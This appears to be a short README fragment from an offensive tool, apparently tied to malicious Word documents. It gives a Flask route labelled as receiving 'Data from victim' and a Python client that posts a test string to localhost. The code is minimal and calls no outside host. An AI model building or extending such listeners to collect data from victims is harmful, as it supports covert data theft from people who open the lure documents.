                   ▄▄▌ ▐ ▄▌      ▄▄▄  ·▄▄▄▄   ▄▄▄· ▄▄▄·  ▄▄· 
                   ██· █▌▐█▪     ▀▄ █·██▪ ██ ▐█ ▄█▐█ ▀█ ▐█ ▌▪
                    ██▪▐█▐▐▌ ▄█▀▄ ▐▀▀▄ ▐█· ▐█▌ ██▀·▄█▀▀█ ██ ▄▄
                    ▐█▌██▐█▌▐█▌.▐▌▐█•█▌██. ██ ▐█▪·•▐█ ▪▐▌▐███▌
                     ▀▀▀▀ ▀▪ ▀█▄▀▪.▀  ▀▀▀▀▀▀• .▀    ▀  ▀ ·▀▀▀

The code below can be used to recieve requests with Python instead of Word, place it inside "views.py"

@views.route("/python", methods=["POST"])
def python():
    print("")
    print(Fore.RED + f"~~~~~~~~~~~~~~~~~~~~ Data from victim ~~~~~~~~~~~~~~~~~~~~")
    input_json = request.get_json(force=True) 
    print(Fore.WHITE + str(input_json))
    dictToReturn = str(Fore.WHITE + "Alive")
    return jsonify(dictToReturn)

The code below can be used to send requests with Python instead of Word, create a new file for this

import requests
dictToSend = "Hello" # String to send
res = requests.post("http://localhost:5000/python", json=dictToSend)
dictFromServer = res.json() 
print(f"Response from server: {dictFromServer}") # dictToReturn sends us the server string
